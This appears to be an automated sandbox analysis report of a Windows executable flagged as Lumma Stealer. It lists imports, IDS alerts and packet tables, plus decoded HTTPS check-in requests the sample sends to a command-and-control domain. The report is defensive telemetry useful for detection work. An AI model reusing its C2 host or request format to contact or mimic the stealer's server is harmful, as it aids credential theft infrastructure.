RT_BITMAP	0x5fb748	0x1df8	Device independent bitmap graphic, 141 x 18 x 24, image size 7632, resolution 2835 x 2835 px/m, 16777216 important colors	English	United States	0.18873826903023982
RT_BITMAP	0x5fd540	0xe48	Device independent bitmap graphic, 141 x 18 x 8, image size 0, resolution 2835 x 2835 px/m, 256 important colors	English	United States	0.450492341356674
RT_BITMAP	0x5fe388	0x1588	Device independent bitmap graphic, 101 x 18 x 24, image size 5472, resolution 2835 x 2835 px/m, 16777216 important colors	English	United States	0.215711175616836
RT_BITMAP	0x5ff910	0xb78	Device independent bitmap graphic, 101 x 18 x 8, image size 0, resolution 2835 x 2835 px/m, 256 important colors	English	United States	0.47513623978201636
RT_BITMAP	0x600488	0x9778	Device independent bitmap graphic, 358 x 36 x 24, image size 38736, resolution 2800 x 2800 px/m	English	United States	0.008716731999174747
RT_ICON	0x609c00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.18497109826589594
RT_ICON	0x60a168	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.4390794223826715
RT_GROUP_ICON	0x60aa10	0x22	data			1.0588235294117647
RT_VERSION	0x60aa34	0x3bc	data	English	United States	0.45083682008368203
RT_MANIFEST	0x60adf0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	CreateThread, GlobalUnlock, GlobalLock, GlobalAlloc, GetTickCount, WideCharToMultiByte, IsBadReadPtr, GlobalAddAtomA, GlobalAddAtomW, GetModuleHandleA, GlobalFree, GlobalGetAtomNameA, GlobalDeleteAtom, GlobalGetAtomNameW, FreeConsole, GetEnvironmentVariableA, VirtualProtect, VirtualAlloc, GetProcAddress, GetLastError, LoadLibraryA, SetLastError, SetThreadPriority, GetCurrentThread, CreateProcessA, GetCommandLineA, GetStartupInfoA, SetEnvironmentVariableA, ReleaseMutex, WaitForSingleObject, CreateMutexA, OpenMutexA, SetErrorMode, GetCurrentThreadId, FindClose, FindFirstFileA, FindFirstFileW, VirtualQueryEx, GetExitCodeProcess, ReadProcessMemory, VirtualProtectEx, UnmapViewOfFile, ContinueDebugEvent, SetThreadContext, GetThreadContext, WaitForDebugEvent, SuspendThread, DebugActiveProcess, ResumeThread, CreateProcessW, GetCommandLineW, GetStartupInfoW, MapViewOfFile, DuplicateHandle, GetCurrentProcess, CreateFileMappingA, WriteProcessMemory, SetEvent, CreateEventA, MultiByteToWideChar, CloseHandle, CreateFileA, GetSystemTimeAsFileTime, ExitProcess, LocalFree, CompareStringW, CompareStringA, FlushFileBuffers, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, FormatMessageA, GetConsoleMode, GetConsoleCP, SetFilePointer, GetLocaleInfoW, GetStringTypeW, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, QueryPerformanceCounter, GetFileType, SetHandleCount, GetEnvironmentStringsW, Sleep, EnterCriticalSection, LeaveCriticalSection, GetVersionExA, InitializeCriticalSection, GetCurrentProcessId, GetModuleFileNameW, GetShortPathNameW, GetModuleFileNameA, GetShortPathNameA, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, DeleteCriticalSection, RtlUnwind, RaiseException, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapAlloc, GetProcessHeap, GetCPInfo, LCMapStringA, LCMapStringW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, HeapSize, WriteFile, GetStdHandle, GetACP, GetOEMCP, IsValidCodePage, HeapDestroy, HeapCreate, VirtualFree, HeapReAlloc, GetTimeZoneInformation
USER32.dll	LoadStringW, IsWindow, PostMessageA, GetDesktopWindow, MoveWindow, SetPropA, EnumThreadWindows, GetPropA, GetMessageA, EndPaint, KillTimer, GetAsyncKeyState, GetSystemMetrics, SetTimer, SetWindowTextA, GetDlgItem, CreateDialogIndirectParamA, ShowWindow, UpdateWindow, LoadStringA, BeginPaint, FindWindowA, WaitForInputIdle, DestroyWindow, MessageBoxA, InSendMessage, UnpackDDElParam, FreeDDElParam, DefWindowProcW, DefWindowProcA, LoadCursorA, RegisterClassW, CreateWindowExW, RegisterClassA, CreateWindowExA, GetWindowThreadProcessId, SendMessageW, SendMessageA, PeekMessageA, TranslateMessage, DispatchMessageA, EnumWindows, IsWindowUnicode, PackDDElParam, PostMessageW
GDI32.dll	SelectObject, BitBlt, DeleteObject, CreatePalette, CreateDCA, SelectPalette, RealizePalette, CreateDIBitmap, DeleteDC, CreateCompatibleDC

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T23:21:12.914580+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.92.91	443	TCP
2024-12-27T23:21:13.648235+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	104.21.92.91	443	TCP
2024-12-27T23:21:13.648235+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.92.91	443	TCP
2024-12-27T23:21:14.966012+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.92.91	443	TCP
2024-12-27T23:21:15.745621+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49738	104.21.92.91	443	TCP
2024-12-27T23:21:15.745621+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.92.91	443	TCP
2024-12-27T23:21:17.354345+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.92.91	443	TCP
2024-12-27T23:21:19.657247+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.92.91	443	TCP
2024-12-27T23:21:21.993137+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.92.91	443	TCP
2024-12-27T23:21:24.590051+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.92.91	443	TCP
2024-12-27T23:21:26.693770+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.92.91	443	TCP
2024-12-27T23:21:27.993028+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49744	104.21.92.91	443	TCP
2024-12-27T23:21:29.343796+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	104.21.92.91	443	TCP
2024-12-27T23:21:30.111486+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49745	104.21.92.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 23:21:11.622512102 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:11.622564077 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:11.622646093 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:11.690202951 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:11.690223932 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:12.914407969 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:12.914580107 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:12.917011976 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:12.917022943 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:12.917424917 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:12.959892988 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:12.961894035 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:12.961915016 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:12.961977959 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:13.648233891 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:13.648309946 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:13.648453951 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:13.649763107 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:13.649781942 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:13.649795055 CET	49737	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:13.649800062 CET	443	49737	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:13.658092022 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:13.658124924 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:13.658201933 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:13.658454895 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:13.658467054 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:14.965913057 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:14.966012001 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:14.967083931 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:14.967094898 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:14.967320919 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:14.968369961 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:14.968384981 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:14.968425035 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745630980 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745673895 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745709896 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745738983 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745769978 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745806932 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745807886 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.745827913 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.745860100 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.754087925 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.754148006 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.754154921 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.767107010 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.767163992 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.767169952 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.819258928 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.865396023 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.912946939 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.912960052 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.955895901 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.955943108 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.955977917 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.955986977 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.956001043 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.956048965 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.956224918 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.956237078 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:15.956249952 CET	49738	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:15.956254005 CET	443	49738	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:16.092202902 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:16.092266083 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:16.092339039 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:16.092637062 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:16.092654943 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:17.354258060 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:17.354345083 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:17.355745077 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:17.355757952 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:17.355982065 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:17.357028961 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:17.357249975 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:17.357285976 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:17.357372999 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:17.357381105 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:18.313754082 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:18.313826084 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:18.314080000 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:18.314748049 CET	49739	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:18.314769030 CET	443	49739	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:18.398427010 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:18.398467064 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:18.398843050 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:18.398843050 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:18.398876905 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:19.657047987 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:19.657247066 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:19.658247948 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:19.658257008 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:19.658454895 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:19.659513950 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:19.659631014 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:19.659657001 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:20.447304964 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:20.447381973 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:20.447421074 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:20.450078964 CET	49741	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:20.450093031 CET	443	49741	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:20.676800013 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:20.676856041 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:20.677076101 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:20.677263021 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:20.677275896 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:21.992973089 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:21.993136883 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:21.994311094 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:21.994323015 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:21.994647980 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:21.995707989 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:21.995874882 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:21.995910883 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:21.995969057 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:21.995978117 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:22.946105957 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:22.946196079 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:22.946362019 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:22.952692986 CET	49742	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:22.952716112 CET	443	49742	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:23.330878019 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:23.330909967 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:23.330971956 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:23.331357956 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:23.331368923 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:24.589970112 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:24.590050936 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:24.591248035 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:24.591259003 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:24.591469049 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:24.595180035 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:24.595248938 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:24.595253944 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:25.358156919 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:25.358232975 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:25.358305931 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:25.358552933 CET	49743	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:25.358573914 CET	443	49743	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:25.465745926 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:25.465790033 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:25.465847015 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:25.466142893 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:25.466156006 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:26.693584919 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:26.693769932 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:26.694911003 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:26.694924116 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:26.695142984 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:26.696258068 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:26.696332932 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:26.696338892 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:27.993030071 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:27.993114948 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:27.993164062 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:27.993277073 CET	49744	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:27.993299961 CET	443	49744	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:28.038866997 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:28.038902998 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:28.039088011 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:28.039335012 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:28.039346933 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:29.343722105 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:29.343796015 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:29.344988108 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:29.345000029 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:29.345196009 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:29.346343994 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:29.346373081 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:29.346401930 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:30.111481905 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:30.111567974 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:30.111711025 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:30.111798048 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:30.111810923 CET	443	49745	104.21.92.91	192.168.2.4
Dec 27, 2024 23:21:30.111821890 CET	49745	443	192.168.2.4	104.21.92.91
Dec 27, 2024 23:21:30.111825943 CET	443	49745	104.21.92.91	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 23:21:11.254877090 CET	64207	53	192.168.2.4	1.1.1.1
Dec 27, 2024 23:21:11.569236040 CET	53	64207	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 23:21:11.254877090 CET	192.168.2.4	1.1.1.1	0x61c5	Standard query (0)	begguinnerz.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 23:20:55.301151037 CET	1.1.1.1	192.168.2.4	0x750b	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 27, 2024 23:20:55.301151037 CET	1.1.1.1	192.168.2.4	0x750b	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 27, 2024 23:21:11.569236040 CET	1.1.1.1	192.168.2.4	0x61c5	No error (0)	begguinnerz.biz	104.21.92.91	A (IP address)	IN (0x0001)	false
Dec 27, 2024 23:21:11.569236040 CET	1.1.1.1	192.168.2.4	0x61c5	No error (0)	begguinnerz.biz	172.67.190.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

begguinnerz.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:12 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: begguinnerz.biz
2024-12-27 22:21:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 22:21:13 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aiova0f1t2baibi05mg6i06r7n; expires=Tue, 22 Apr 2025 16:07:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hh%2F8oySgx0%2BYSGjqZfzsU0A%2BYf4WCwvicxrqHBYXYIkE6WCSNB%2BmeREM%2BShTIm%2B3AIrgoqpO0wmnXQhbiUHwQhAaCQQ8T0NWXnnXannfcN9uT%2F4yHDQ4d9psqqqeL988tIA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb3cd69e917e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1519&rtt_var=585&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1845764&cwnd=232&unsent_bytes=0&cid=ac8902c75cff334e&ts=748&x=0"
2024-12-27 22:21:13 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 22:21:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:14 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: begguinnerz.biz
2024-12-27 22:21:14 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-27 22:21:15 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=adk5741kermsfovakiase02u8f; expires=Tue, 22 Apr 2025 16:07:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiVkn73MaVpRxEprMJ25JO1i2M%2B44zuJeRp7%2BoKZ5HqCrlLTaf5GoqusFXneQwF9rJE2iMvT1Iu%2FuJrq%2BsEVLXTqnDsF81T9XfCFfaAqZx1%2FKvwy%2FRpfAPkJGetmWinFBU8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb3da59d54386-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1858&rtt_var=717&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=985&delivery_rate=1504379&cwnd=246&unsent_bytes=0&cid=5a07b72d74bde815&ts=786&x=0"
